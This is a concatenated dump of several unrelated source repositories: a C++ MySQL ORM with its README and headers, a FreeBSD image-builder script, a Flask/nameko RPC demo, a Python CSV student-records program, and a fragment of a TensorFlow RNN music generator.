for i in xrange(1, len(list_data), 1):
sample_data, _ = sf.read(location + list_data[i])
if len(sample_data.shape) > 1:
sample_data = sample_data[:, 0]
data = np.append(data, sample_data, axis = 0)
return data * amplitude, samplerate<file_sep>/main.py
from utils import get_data_from_location
from graph import generategraph
from model import Model
from settings import *
import tensorflow as tf
import numpy as np
import time
dataset, samplerate = get_data_from_location(FLAGS.data_dir, FLAGS.amplitude)
# this is for neural network
model = Model(FLAGS.learning_rate, FLAGS.num_layers, FLAGS.sound_batch_size, FLAGS.size)
# start the session graph
sess = tf.InteractiveSession()
# initialize global variables
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(tf.global_variables())
def train():
print "Train for " + str(FLAGS.max_epoch) + " iteration"
for i in xrange(FLAGS.max_epoch):
last_time = time.time()
init_value = np.zeros((1, FLAGS.num_layers * 2 * FLAGS.size))
for x in xrange(0, dataset.shape[0] - (2 * FLAGS.sound_batch_size), FLAGS.sound_batch_size):
batch = np.zeros((1, 1, FLAGS.sound_batch_size))
batch_y = np.zeros((1, 1, FLAGS.sound_batch_size))
batch[0, 0, :] = dataset[x: x + FLAGS.sound_batch_size]
batch_y[0, 0, :] = dataset[x + FLAGS.sound_batch_size: x + (2 * FLAGS.sound_batch_size)]
_, loss = sess.run([model.optimizer, model.cost], feed_dict={model.X: batch, model.Y: batch_y,
model.back_hidden_layer: init_value, model.forward_hidden_layer: init_value})
print "batch: " + str(i + 1) + ", loss: " + str(np.mean(loss)) + ", speed: " + str(time.time() - last_time) + " s / epoch"
if (i + 1) % FLAGS.checkpoint_epoch == 0:
saver.save(sess, FLAGS.train_dir + "model.ckpt")
generategraph(dataset, model, sess, samplerate, FLAGS.sound_batch_size, checkpoint = True)
def main():
if FLAGS.decode:
test()
else:
train()
main()<file_sep>/model.py
import tensorflow as tf
import numpy as np
class Model:
def __init__(self, learning_rate, num_layers, shape_3d, size_layer):
self.num_layers = num_layers
self.size_layer = size_layer
rnn_cells = tf.nn.rnn_cell.LSTMCell(size_layer, state_is_tuple = False)
self.back_rnn_cells = tf.nn.rnn_cell.MultiRNNCell([rnn_cells] * num_layers, state_is_tuple = False)
self.forward_rnn_cells = tf.nn.rnn_cell.MultiRNNCell([rnn_cells] * num_layers, state_is_tuple = False)
self.X = tf.placeholder(tf.float32, (None, None, shape_3d))
self.Y = tf.placeholder(tf.float32, (None, None, shape_3d))
self.net_last_state = np.zeros((num_layers * 2 * size_layer))
self.back_hidden_layer = tf.placeholder(tf.float32, shape=(None, num_layers * 2 * size_layer))
self.forward_hidden_layer = tf.placeholder(tf.float32, shape=(None, num_layers * 2 * size_layer))
self.outputs, self.last_state = tf.nn.bidirectional_dynamic_rnn(self.forward_rnn_cells, self.back_rnn_cells,
self.X, sequence_length = [1],
initial_state_fw = self.forward_hidden_layer, initial_state_bw = self.back_hidden_layer,
dtype = tf.float32)
self.rnn_W = tf.Variable(tf.random_normal((size_layer, shape_3d)))
self.rnn_B = tf.Variable(tf.random_normal((shape_3d,)))
# linear dimension for x in (Wx + B)
outputs_reshaped = tf.reshape(self.outputs, [-1, size_layer])
y_batch_long = tf.reshape(self.Y, [-1, shape_3d])
# y = Wx + B
self.logits = (tf.matmul(outputs_reshaped, self.rnn_W) + self.rnn_B)
self.cost = tf.square(y_batch_long - self.logits)
self.optimizer = tf.train.AdamOptimizer(learning_rate).minimize(self.cost)
def step(self, sess, x, init_zero_state = True):
# Reset the initial state of the network.
if init_zero_state:
init_value = np.zeros((self.num_layers * 2 * self.size_layer,))
else:
init_value = self.net_last_state
# we want to get the constant in our output layer, same size as dimension input
probs, next_lstm_state = sess.run([self.logits, self.last_state], feed_dict={self.X:[x], self.back_hidden_layer:[init_value], self.forward_hidden_layer:[init_value]})
self.net_last_state = next_lstm_state[0][0]
return probs
|
e75c83970e1a686708636f4823c0a250457a3d56
|
[
"Markdown",
"Python"
] | 6 |
Markdown
|
wangkunctc/Generate-Music-Bidirectional-RNN
|
cd5006b53a473e2099cb74c4cbbd48096d49fa25
|
a99fdc85ff8192254fbccde54cdb7019e9120d74
|
refs/heads/master
|
<repo_name>craigplusplus/jquery-dynalist<file_sep>/README.md
Dynalist jQuery Plugin -- OBSOLETE
======================
This is a script that handles a list with nested collapsing sections in a style-agnostic way. It is not assumed that the list is formatted as tabbed data, or an accordion list, or any other format. These presentational concerns are restricted to the accompanying stylesheets.
The impetus of this was the need to apply responsive web design to information-dense websites. In mobile views, accordion lists are the go-to solution for particularly heavy pages, while desktop users might prefer tabs of one kind or another. Since most scripts out there are designed for one format or the other, there was a need for a flexible script such as this.
Included Stylesheets
--------------------
Naturally, a script such as this is useless without separate stylesheets defining the format. Included are two: v_tabs and h_tabs. v_tabs.css defines rules for a list which is formatted as vertical tabs in a desktop environment, and an accordion list on mobile. h_tabs likewise formats as an accordion on mobile, but provides horizontal tabs on desktop.
Usage Example
-------------
See the included test.html file for live examples.
// Include the stylesheet for horizontal tabs
<link rel="stylesheet" type='text/css' href='h_tabs.css' />
<script src='jquery.dynalist.js'></script>
<script>
$(document).ready(function(){
$('#horizontal_tabs_eg').dynalist( {
desktop: {
// The open list item is pre-chosen by assigning this class to it
visibleSelector: '.open',
// No animation
hideSpeed: 0,
// One tab is always open
fullyCollapsable: false },
mobile: {
// Conversely, on mobile, no list item is visible by default.
visibleSelector: null
}
} );
}
</script>
<!-- ... -->
<ul id='horizontal_tabs_eg' class='horizontal_tabs'>
<li>First Tab
<ul>
<li>Link 1.1</li>
<li>Link 1.2</li>
<li>Link 1.3</li>
</ul>
</li>
<li class='open'>Second Tab
<ul>
<li>This is the content</li>
<li>In this case, I'm imagining a list of links</li>
<li>Could be anything, though.</li>
</ul>
</li>
<li>Third Tab
<ul>
<li>Link 3.1</li>
<li>Link 3.2</li>
<li>Link 3.3</li>
</ul>
</li>
</ul>
Options
-------
Note that it is possible to define different behaviour to be used on desktops than is used on mobile devices. The 'options' object holds two sub-objects, 'desktop' and 'mobile.' A variable defined in either of these will override the behaviour defined in the root 'options' object. Only two variables, 'selectedClass' and 'switchWidth' may not be overriden.
* selectedClass (string): A classname to apply to the selected list item. Default: 'open'.
Note: This cannot be overridden by the Desktop or Mobile subobects.
* switchWidth (int): The threshold width above which a desktop platform is assumed. Default: 480.
* visibleSelector (string): Elements matching this selector will be marked as visible when the script is initialized. Default: ':first'.
* fullyCollapsable (boolean): Defines the behaviour to occur when an already visible element is clicked. If true, the element will be hidden, and the list will be fully collapsed. If false, no action will be taken. Default: true.
* hideSpeed (int): The duration of any conceal animation, in milliseconds. Default: 500.
* showSpeed (int): The duration of any reveal animation, in milliseconds. Default: 500.
* hideAction (callback function): A function to handle the conceal animation for list content. Accepts two parameters: the jQuery collection to apply the animation to, and the speed at which the animation should proceed. Note that two functions are provided as members of the dynalist object for use here; dynalist.slideUp and dynalist.fadeOut. These functions are merely wrappers around the native jQuery effects. Default: $.fn.dynalist.slideUp.
* showAction (callback function): A function to handle the reveal animation for list content. Accepts two parameters: the jQuery collection to apply the animation to, and the speed at which the animation should proceed. Note that two functions are provided as members of the dynalist object for use here; dynalist.slideDown and dynalist.fadeIn. These functions are merely wrappers around the native jQuery effects. Default: $.fn.dynalist.slideDown.
* desktop (object): A sub-object in which any of the above options (except those noted) may be overridden for use in a desktop environment.
* mobile (object): A sub-object in which any of the above options (except those noted) may be overridden for use in a mobile environment.
Customization
-------------
Note that some member functions of the dynalist object are publicly defined and accessable. This means that they can be redefined before use to modify certain behaviour. This is particularly useful in the case of dynalist.isMobile(), the member function used to define whether an environment is considered to be dektop or mobile.
By design, this function works rather naivly, simply by comparing the browser width to the switchWidth option. Depending on your usage, you may well want more complex decision making here. Below is an example of overriding this function with one that makes its determination based on an element that is hidden by CSS media queries for mobile devices. Such a method would have the advantage of keeping the determination of evnironment type completely restricted to the stylesheet files.
<style type='text/css' media="screen and (min-device-width: 480px)">
.not_mobile { display: none; }
</style>
<script src='jquery.dynalist.js'></script>
<script>
// Create custom behaviour
$.dynalist.isMobile = function( switchWidth ) {
return $('.not_mobile:visible').length > 0;
}
// Then init
$(document).ready(function(){
$('#your_list').dynalist();
});
</script>
Author
------
<NAME>
<EMAIL>.info
Licence
-------
!["Creative Commons License"] (http://i.creativecommons.org/l/by/3.0/88x31.png)
This work is licensed under a [Creative Commons Attribution 3.0 Unported License] (http://creativecommons.org/licenses/by/3.0/).
<file_sep>/jquery.dynalist.js
/**
* dynalist
* Author <NAME> 2012
*/
/**
* jQuery plug-in to compress and expand lists with nested elements.
* Intended to be used with CSS to provide a tabbed view on desktop
* and accordian view on mobile devices, according to responsive design principles.
*
* See defaults object below for full list of configuration options.
*
* @author <NAME>
*/
(function($) {
$.fn.dynalist = function( o ) {
// Usual defaults override, plus population of mobile / desktop sub-objects with defaults
var vars = $.extend( {}, $.fn.dynalist.defaults, o );
vars.desktop = $.extend( {}, vars, vars.desktop );
vars.mobile = $.extend( {}, vars, vars.mobile );
var dynalist = $.fn.dynalist;
// Wrap any text nodes, in case the triggering phrase has not been wrapped
this.children().contents().filter(function() {
return this.nodeType == 3 && $.trim(this.textContent) != '';
}).wrap('<span></span>')
// Hide everything to begin with
this.children().children(':not(:first-child)').hide();
// Show elements matching visibleSelector, if this is called for
var visibleSelector = dynalist.isMobile( vars.switchWidth )
? vars.mobile.visibleSelector
: vars.desktop.visibleSelector;
if( visibleSelector ) {
this.children( visibleSelector ).addClass( vars.selectedClass ).children(':not(:first-child)').show();
}
// Apply onClick behaviour
this.children().children(':first-child').click(function(evt){
var parent = $( this ).parent();
var fullyCollapsable = dynalist.isMobile( vars.switchWidth )
? vars.mobile.fullyCollapsable
: vars.desktop.fullyCollapsable;
evt.preventDefault();
conceal( parent.siblings() );
if( !parent.hasClass( vars.selectedClass ) ) {
reveal( parent );
} else if( fullyCollapsable ) {
conceal( parent );
}
});
// Member functions follow //
function reveal( el ) {
if( dynalist.isMobile( vars.switchWidth ) )
vars.mobile.showAction( el.children(':not(:first-child)'), getShowSpeed() );
else
vars.desktop.showAction( el.children(':not(:first-child)'), getShowSpeed() );
el.addClass( vars.selectedClass );
}
function conceal( el ) {
if( dynalist.isMobile( vars.switchWidth ) )
vars.mobile.hideAction( el.children(':not(:first-child)'), getHideSpeed() );
else
vars.desktop.hideAction( el.children(':not(:first-child)'), getHideSpeed() );
el.removeClass( vars.selectedClass );
}
function getHideSpeed() {
return dynalist.isMobile( vars.switchWidth ) ? vars.mobile.hideSpeed : vars.desktop.hideSpeed;
}
function getShowSpeed() {
return dynalist.isMobile( vars.switchWidth ) ? vars.mobile.showSpeed : vars.desktop.showSpeed;
}
return this;
};
/* Member function to determine whether we are in a mobile or desktop state.
* @param Int switchWidth From dynalist.defaults, this contains the browser width
* considered to be the threshold between mobile and desktop views.
*/
$.fn.dynalist.isMobile = function( switchWidth ) {
return $(window).width() < switchWidth;
}
/* Default animation functions, for use as callbacks for hideAction and showAction options. */
$.fn.dynalist.fadeOut = function( coll, speed ) { coll.fadeOut( speed ); };
$.fn.dynalist.fadeIn = function( coll, speed ) { coll.fadeIn( speed ); };
$.fn.dynalist.slideUp = function( coll, speed ) { coll.slideUp( speed ); };
$.fn.dynalist.slideDown = function( coll, speed ) { coll.slideDown( speed ); };
$.fn.dynalist.defaults = {
// NOTE: The following two variables are universal;
// they cannot be overridden by the desktop or mobile sub-objects.
selectedClass: 'open', // Classname to apply to selected list item
switchWidth: 480, // Pixel width to switch animations at
// All following variables may be overridden by desktop or mobile sub-objects.
visibleSelector: ':first', // Elements matching this selector will be visible on load.
fullyCollapsable: true, // If true, clicking on an open tab will close it.
hideSpeed: 500, // Duration of animation in milliseconds
showSpeed: 500, // Duration of animation in milliseconds
// Follows are the callback functions to apply a show or hide animation.
// All functions accept two parameters:
// the jQuery collection of tabs to show or hide, and the speed in milliseconds to do it at.
hideAction: $.fn.dynalist.slideUp,
showAction: $.fn.dynalist.slideDown,
// Follows are setting overrides to apply only in desktop mode or mobile mode.
// See above for variables which cannot be overridden.
desktop: {
desktop: null, // Just to keep things tidy upon extend call
mobile: null, // Just to keep things tidy upon extend call
},
mobile: {
desktop: null, // Just to keep things tidy upon extend call
mobile: null, // Just to keep things tidy upon extend call
}
};
})(jQuery);
|
6be8e1e5ca32dcebadbabe2eaef03b65151a7de5
|
[
"Markdown",
"JavaScript"
] | 2 |
Markdown
|
craigplusplus/jquery-dynalist
|
8d4480bb193e33b21ce610fc6c055adcf24293c8
|
482bc00fbd8c3df3d480ea2d329f4b4849bdf57b
|
refs/heads/master
|
<file_sep># 并发调用
import json
from multiprocessing.pool import ThreadPool
from nameko.standalone.rpc import ClusterRpcProxy
def call_rpc(**kwargs):
config = {
'AMQP_URI': kwargs.get('amqp_uri')
}
with ClusterRpcProxy(config) as cluster_rpc:
service = getattr(cluster_rpc, kwargs.get('service'))
method = getattr(service, kwargs.get('method'))
return json.loads(method(json.dumps(kwargs.get('parameters', {}))))
def call_all_rpc(*workers) -> list:
pool = ThreadPool(len(workers))
results = []
for worker in workers:
results.append(pool.apply_async(call_rpc, kwds=worker))
pool.close()
pool.join()
results = [r.get() for r in results]
return results
<file_sep>项目使用Python3
# 结构
* http_server: http rest api,接收批量任务参数,任务生产者
* rpc_worker: 任务消费者,有三个服务:job1/2/3, 分别延迟1/2/3秒
# 启动方式
1. 消息队列:可以使用docker创建rabbitmq容器:`docker run -d -p 5672:5672 rabbitmq:3`
2. rpc_worker:`nameko run rpc_worker`
3. http_server:`python http_server.py`
# 测试
* job1 x 1, 约1秒
```shell script
curl --location -s -w %{time_total} --request POST 'localhost:5000/execute/' \
--header 'Content-Type: application/json' \
--data-raw '{
"jobs": [
{
"job": "job1",
"parameters": {
"a": 1,
"b": 2
}
}
]
}'
```
* job1 x 2, 约1秒
```shell script
curl --location -s -w %{time_total} --request POST 'localhost:5000/execute/' \
--header 'Content-Type: application/json' \
--data-raw '{
"jobs": [
{
"job": "job1",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job1",
"parameters": {
"a": 1,
"b": 2
}
}
]
}'
```
* job1 x 1 + job2 x 3 + job3 x 1, 约3秒
```shell script
curl --location -s -w %{time_total} --request POST 'localhost:5000/execute/' \
--header 'Content-Type: application/json' \
--data-raw '{
"jobs": [
{
"job": "job1",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job2",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job2",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job2",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job3",
"parameters": {
"a": 1,
"b": 2
}
}
]
}'
```
<file_sep># http server 接收任务,并发调用worker
from flask import Flask, request
from utils import call_all_rpc
class Config:
# rpc worker 配置
WORKERS = {
# 任务code,客户端调用时传递
'job1': {
# worker 消息中间件、服务名称、方法名称
'amqp_uri': 'pyamqp://guest:guest@localhost',
'service': 'service_job_1',
'method': 'execute',
},
'job2': {
'amqp_uri': 'pyamqp://guest:guest@localhost',
'service': 'service_job_2',
'method': 'execute',
},
'job3': {
'amqp_uri': 'pyamqp://guest:guest@localhost',
'service': 'service_job_3',
'method': 'execute',
},
}
app = Flask(__name__)
app.config.from_object(Config)
@app.route('/execute/', methods=['POST'])
def execute():
"""执行任务
调用方式:
curl --location --request POST 'localhost:5000/execute/' \
--header 'Content-Type: application/json' \
--data-raw '{
"jobs": [
{
"code": "job1",
"parameters": {
"a": 1,
"b": 2
}
},
{
"code": "job2",
"parameters": {
"a": 3,
"b": 4
}
}
]
}'
:return:
"""
data = request.json # type: dict
if not data:
return {'code': 'ParameterError', 'message': 'Json required.'}
jobs = data.get('jobs', [])
workers = []
for job in jobs:
code = job.get('job')
# 根据客户端任务类型找到worker
worker = app.config.get('WORKERS').get(code)
if not worker:
return {'code': 'ParameterError', 'message': 'Invalid job code.'}
# 将任务参数传入worker中
worker['parameters'] = job.get('parameters', {})
workers.append(worker)
results = call_all_rpc(*workers)
return {'code': 'Success', 'data': results}
if __name__ == '__main__':
app.run(debug=True)
<file_sep># rpc worker,job1/2/3模拟业务逻辑
import json
import time
from nameko.rpc import rpc
class ServiceJob1:
name = "service_job_1"
@rpc
def execute(self, parameter: str) -> str:
try:
json_parameter = json.loads(parameter)
except Exception:
return json.dumps({'code': 'ParameterError'})
data = {
'parameter': json_parameter,
'service': self.name,
}
print(f'service: {self.name} get job: {parameter}')
time.sleep(1)
return json.dumps({'code': 'Success', 'data': data})
class ServiceJob2:
name = "service_job_2"
@rpc
def execute(self, parameter: str) -> str:
try:
json_parameter = json.loads(parameter)
except Exception:
return json.dumps({'code': 'ParameterError'})
data = {
'parameter': json_parameter,
'service': self.name,
}
print(f'service: {self.name} get job: {parameter}')
time.sleep(2)
return json.dumps({'code': 'Success', 'data': data})
class ServiceJob3:
name = "service_job_3"
@rpc
def execute(self, parameter: str) -> str:
try:
json_parameter = json.loads(parameter)
except Exception:
return json.dumps({'code': 'ParameterError'})
data = {
'parameter': json_parameter,
'service': self.name,
}
print(f'service: {self.name} get job: {parameter}')
time.sleep(3)
return json.dumps({'code': 'Success', 'data': data})
<file_sep>flask==1.1.2
nameko==2.12.0
|
4ede564ec71b0229b9e09bc3f2eb891afb4f57c1
|
[
"Markdown",
"Python",
"Text"
] | 5 |
Python
|
aishenghuomeidaoli/nameko_demo
|
37fcaa5b9321e18abfc62d887962693e0de07e0e
|
4ed6d655afca0ea8863a7952f08cc5212c4655cb
|
refs/heads/main
|
<repo_name>helmarIsrael/ssid<file_sep>/Database.py
import csv
import pandas
import os
column_names = ["Student ID","Name","Year Level","Gender","Course"] #the columns of the csv
filesize = os.path.getsize("student_database.csv") # checks if the file is empty
if filesize == 0:
with open("student_database.csv", mode="w") as student_database: #if file is empty, it will create the columns first
student_list = csv.writer(student_database, delimiter=",")
student_list.writerow(column_names)
def cls():
print("\n" * 100)
def view_student(): #this function will show the list of students input by the user
df = pandas.read_csv("student_database.csv", 'r', delimiter=",")
df.to_csv("student_database.csv", header=column_names, index=False)
df_csv = pandas.read_csv("student_database.csv")
print(df_csv)
input("Press enter to return to main menu...")
def add_student(): #this function will allow user to add students
with open("student_database.csv", mode="a") as student_database:
student_list = csv.writer(student_database)
df = pandas.read_csv("student_database.csv")
df.to_csv("student_database.csv", index=None, header=column_names)
print("Input student ID: ")
id = input()
print("Input name: ")
name = input()
print("Year level: ")
year_level = input()
print("Gender [M, F, LGBTQ]: ")
gender = input().upper()
print("Course: ")
course = input().upper()
student_list.writerow([id, name, year_level, gender, course])
print("Student added!")
input("Press enter to return to main menu...")
def edit_student(): #this function allows the user to change the values of the student eg. name, gender, etc.
print("Enter the student ID number to edit value: ") #it does not support student id change so to change the student id, one must delete the student and create a new one.
edit = input()
with open("student_database.csv") as student_database:
student_list = csv.reader(student_database)
df = pandas.read_csv("student_database.csv", index_col="Student ID")
for row in student_list:
bool = True
if edit in row:
print("What value will you change?\n"
"1. Name\n"
"2. Year Level\n"
"3. Gender\n"
"4. Course\n"
"Note: To change Student ID, delete the ID number and add a new one.")
value = int(input())
with open("student_database.csv") as student_database:
student_list = csv.reader(student_database)
df = pandas.read_csv("student_database.csv", index_col="Student ID")
for row in student_list:
if edit in row:
if value == 1:
print(row)
print("Input a new name: ")
name = input()
df._set_value(edit, "Name", name)
df.to_csv("student_database.csv")
print("Done.")
input("Press enter to return to main menu...")
break
elif value == 2:
print(row)
print("Input a new year level: ")
yr_lvl = input()
df._set_value(edit, "Year Level", yr_lvl)
df.to_csv("student_database.csv")
print("Done.")
input("Press enter to return to main menu...")
break
elif value == 3:
print(row)
print("Apply a new gender: ")
gender = input()
df._set_value(edit, "Gender", gender)
df.to_csv("student_database.csv")
print("Done.")
input("Press enter to return to main menu...")
break
elif value == 4:
print(row)
print("Change a new course: ")
course = input()
df._set_value(edit, "Course", course)
df.to_csv("student_database.csv")
print("Done.")
input("Press enter to return to main menu...")
break
else:
print("Wrong Value")
input("Press enter to return to main menu...")
break
else:
bool = False
if bool == False:
print("ID not found")
input("Press enter to return to main menu...")
def delete_student(): #this will allow for the user to delete the student in the list using the student ID
print("Input Student ID:")
id = str(input())
with open("student_database.csv") as student_database:
student_list = csv.reader(student_database)
df = pandas.read_csv("student_database.csv", index_col= "Student ID")
for row in student_list:
bool = True
if id in row:
df.drop(id, axis= 0, inplace= True)
df.to_csv("student_database.csv")
print("Succesfully deleted! ")
input("Press enter to return to main menu...")
else:
bool = False
if bool == False:
print("No Student ID found.")
input("Press enter to return to main menu...")
def find(): #this function will find the student based on its student ID
print("Enter Student ID number: ")
id = str(input())
with open("student_database.csv") as student_database:
student_list = csv.reader(student_database)
df = pandas.read_csv("student_database.csv", index_col="Student ID")
for row in student_list:
bool = True
if id in row:
print(row)
input("Press enter to return to main menu...")
else:
bool = False
if bool == False:
print("No Student ID found.")
input("Press enter to return to main menu...")
def exit(): #this function will end the program
print("Goodbye")
quit()
while True:
print("----------------")
print("Student Database")
print("1. View Students Information\n"
"2. Add a student\n"
"3. Edit student\n"
"4. Delete a student\n"
"5. Find Student ID\n"
"6. Exit\n"
"\n"
"Input: ")
selection = input()
if selection == "1":
view_student()
cls()
elif selection == "2":
add_student()
cls()
elif selection == "3":
edit_student()
cls()
elif selection == "4":
delete_student()
cls()
elif selection == "5":
find()
cls()
elif selection == "6":
exit()
else:
print("Please select the desired values...")<file_sep>/README.md
# ssid
gui is still in progress
the program features the basic database for the students to use
|
35b1a6cddf81b7d88f3ce7f2b030ff59e31dd718
|
[
"Markdown",
"Python"
] | 2 |
Python
|
helmarIsrael/ssid
|
fb9c292c33624a83fe501da5117fe6c21f878292
|
9c3b287ee70527da794c67220528b38593cd3625
|
refs/heads/master
|
<file_sep>#!/usr/bin/env bash
# Run > mfsbsd image. dd mfsbsd image to usb stick. Boot box with stick. Add pv to the pipe if you want timing, speed, and size.
# This should work on a Rackspace account, in any datacenter.
ACCOUNT=${1:-default}
IMAGE=f0b8595d-128e-4514-a5cc-847429dcfa6b
FLAVOR=performance1-8
NAME=explition-freebsd-builder-`date +%s`
# ##you provide these##
baker.sh $ACCOUNT $IMAGE $FLAVOR "base.sh rc.conf packages "" $NAME
<file_sep>Explition FreeBSD base image
============================
Sources
=======
mfsbsd
FreeBSD 10-STABLE
Defaults
========
* Login: root/root
Configuration
=============
* packages file: Space separate list of packages you want installed (fetched via pkgng, so must be in ports). Dependency listing not necessary.
* rc.conf file: If you want a custom rc.conf, this is the place to do it.
* make.conf: We don't build the ports (yet), but this can be used to help finetune the base system.
|
665b60512b2bcf2541cfd5782b9f88501de96878
|
[
"Markdown",
"Shell"
] | 2 |
Shell
|
explition/freebsd
|
06c2d2c2fd53266516ee6496de0e6bbaf873dba0
|
d1a035ba3035b0bd75c7e7117d34036135b8ed95
|
refs/heads/main
|
<repo_name>135356/BBMySQL<file_sep>/README.md
# MysqlOrm
###### Mysql数据库映射,如若有人关注会持续更新(需要先安装 *mysql 8* 在运行该项目)
> 请到发布区 Releases 下载已经编译好的内容(支持全平台 windows、linux、ios),解压 编辑./main.cpp 然后cmake编译 运行。如遇问题欢迎骚扰: <EMAIL>
### 视频演示(1.0分支)
> [bilibili.com/video/BV1ey4y1L7UR/](https://www.bilibili.com/video/BV1ey4y1L7UR/)
### 数据库基本信息配置文件:
> *./build/bb_mysql_orm_config.conf*
### 记录异常的文件:
> *./build/bb.log*
### 示例mode文件:
> *位置:./include/mode/dbA1_test.hpp*
> 继承dql(拥有它的所有方法),以类名称创建数据库与数据表,通过mode类对mysql对应的数据库与数据表进行: 增、删、改、查
> 下划线区分: 数据库_数据表
> 大写字母将转成下划线,如: dbA1_aaaBbb将转换成: 【数据库:db_a1 与 数据表:aaa_bbb】
#### 示例(main.cpp):
```c++
#include "mode/dbA1_test.hpp"
int main() {
//查看db_a1数据库的test数据表 id 大于 1 的数据
dbA1_test::obj().where("id",">","1")->show();
//向db_a1数据库的test数据表插入内容:id自增长,a1字段 为123,a2字段 为 abc
dbA1_test::obj().insert({{"a1","123"},{"a2","abc"}});
return 0;
}
```
<file_sep>/build/mysql_orm/include/mysql_orm/sql/ddl.h
//
// Created by 邦邦 on 2022/4/17.
//
#ifndef MYSQLORM_DDL_H
#define MYSQLORM_DDL_H
#include <map>
#include <vector>
#include <array>
#include <string>
#include <cstring>
#include "bb/Log.h"
#include "mysql.h"
namespace bb {
class ddl {
ddl();
~ddl();
protected:
std::string config_path_ = "./bb_mysql_orm_config.conf"; //配置文件
std::map<std::string, std::string> config; //数据库的配置信息
int initMysql(std::string &host, std::string &user, std::string &password, std::string &port, std::string &unix_socket, std::string &client_flag);
public:
std::vector<MYSQL> connect{}; //mysql的tcp连接
unsigned dql_index{}; //负载均衡下标,轮询切换服务器,只有DQL需要切换只在new的时候切换(同一个用户不进行切换)
static ddl &obj(); //单例
};
}
#endif //MYSQLORM_DDL_H
<file_sep>/build/mysql_orm/include/mysql_orm/mode/dbA1_test.hpp
//
// Created by 邦邦 on 2022/4/26.
//
#ifndef MYSQLORM_DBA1_TEST_HPP
#define MYSQLORM_DBA1_TEST_HPP
#include "sql/dql.h"
class dbA1_test:public bb::dql{
dbA1_test(){
if(run_() != 0){
bb::Log::obj().error("mode创建的时候出现问题");
}
update_();
}
public:
static dbA1_test &obj(){
static dbA1_test dbA1_test;
return dbA1_test;
}
protected:
int run_(){
std::array<std::string,2> obj_info = getName_();
DB_name_ = obj_info[0];
table_name_ = obj_info[1];
if(createDB(DB_name_) == 0 && useDB(DB_name_) == 0){
if(isTable(table_name_) == 0){
if(create_() != 0){return -1;}
}
return useTable(table_name_);
}
return 0;
}
int create_(){
return createTable(table_name_,[](auto *data){
data->int_("a1")->default_(123)->comment_("注释");
data->string_("a2")->nullable_();
data->dateAt_();
});
}
void update_(){
//delDB_("db_a1");
}
void delTable_(const std::string &db_name={},const std::string &table_name={}){
if(!db_name.empty()){
DB_name_ = db_name;
}
if(!table_name.empty()){
table_name_ = table_name;
}
useDB(DB_name_);
delTable();
}
void delDB_(const std::string &db_name={}){
if(!db_name.empty()){
DB_name_ = db_name;
}
delDB(DB_name_);
}
};
#endif //MYSQLORM_DBA1_TEST_HPP
<file_sep>/build/bb/include/bb/tcp/S_Epoll.h
// 跨平台的epoll
// Created by 邦邦 on 2022/6/17.
//
#ifndef BB_S_EPOLL_H
#define BB_S_EPOLL_H
#include <cstring>
#include <csignal> //kill
#include <functional>
#include "bb/Log.h"
#include "IpTcp.h"
#include "bb/FloodIP.hpp"
namespace bb {
class S_Epoll {
IpTcp *tcp_{};
const unsigned short EPOLL_MAX_SIZE{2000}; //epoll_fd最大值
//添加epoll事件(往epoll(内核事件表)里添加事件)
bool addEventF_(int &epoll_fd,int &client_fd,uint32_t &client_ip,const unsigned &events);
//删除epoll事件
bool deleteEventF_(int &epoll_fd, int &client_fd);
//修改epoll事件
bool modifyEventF_(int &epoll_fd, int &client_fd,const unsigned &events);
public:
S_Epoll(const int &port,const unsigned &timeout){
tcp_ = new IpTcp({}, port,timeout);
}
~S_Epoll(){
delete tcp_;
}
//epoll使用
void runF(const std::function<bool(int &client_fd,unsigned &client_ip)> &f);
};
}
#endif //BB_S_EPOLL_H
<file_sep>/build/bb/include/bb/http/Serve.h
#ifndef BB_SERVE_H
#define BB_SERVE_H
#include <map>
#include <string>
#include <regex>
#include "bb/file.h"
#include "bb/tcp/IpTcp.h"
#include "bb/tcp/S_Epoll.h"
#include "Analyze.h"
#include "Config.hpp"
#include "bb/Token.h"
namespace bb{
namespace http{
struct Serve{
int client_fd{}; //客户端fd
Analyze *info{}; //解析http头信息
char r_buf[Config::RECF_MAX]{}; //接收内容
ssize_t r_size{}; //接收到的数据大小
Serve(int &fd);
~Serve();
//发数据(头与数据)
bool sendF(const std::string &method,std::string &data,size_t &size);
//发送响应数据头(只有头数据)
bool sendF(const std::string &method,const std::string &state,const std::string &type="html",const size_t &size={},const bool &is_gzip=false,const bool &is_cache=false);
//网页请求
bool sendHtml();
//接收json格式的数据
bool recvJson(std::map<std::string, std::string> &r_data);
//客户端上传文件
bool recvFile(std::string &token);
//客户端要下载文件
bool sendFile(std::string &token);
};
}
}
#endif<file_sep>/build/bb/include/bb/pool_wait.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_POOL_WAIT_H
#define BB_POOL_WAIT_H
#include <vector>
#include <list>
#include <mutex>
#include <future>
#include <thread>
#include <functional>
namespace bb{ //当全部线程阻塞时,空出线程后将没有运行的项目运行
class pool_wait{
struct task_list{
task_list():lock(mutex,std::defer_lock){}
std::thread thread{};
std::mutex mutex{};
std::unique_lock<std::mutex> lock;
std::condition_variable condition{};
std::list<std::function<void()>> task{};
};
unsigned short index{}; //当前下标
unsigned short work_max; //最大线程数
std::vector<task_list> f_list{}; //任务
size_t run_size{}; //正在运行的项目数量
bool state_ = true; //为假停止阻塞
explicit pool_wait(const unsigned short &max=3);
~pool_wait();
void run(unsigned short &i);
void push(const std::function<void()> &f,unsigned short i);
public:
static pool_wait &obj(const unsigned short &max=3);
void push(const std::function<void()> &f);
void close();
};
}
#endif //BB_POOL_WAIT_H
<file_sep>/main.cpp
#include "mode/dbA1_test.hpp"
int main() {
dbA1_test::obj().where("id",">","0")->show();
return 0;
}<file_sep>/build/mysql_orm/include/mysql_orm/sql/dml_type.h
// 数据类型
// Created by 邦邦 on 2022/4/18.
//
#ifndef MYSQLORM_DML_TYPE_H
#define MYSQLORM_DML_TYPE_H
#include <vector>
#include <array>
#include <string>
#include "bb/Log.h"
namespace bb {
class dml_type {
protected:
std::vector<std::array<std::string, 6>> sql_arr_; //sql对象数组{key,"TINYINT类型","3长度","3精度","NOT NULL附加项","1是否redis索引"}
std::vector<std::string> sql_other_; //特殊如INDEX (c2,c3)
public:
//小小整型-2^7 到 2^7-1(-128到127),0到255 默认为4 大小1个字节
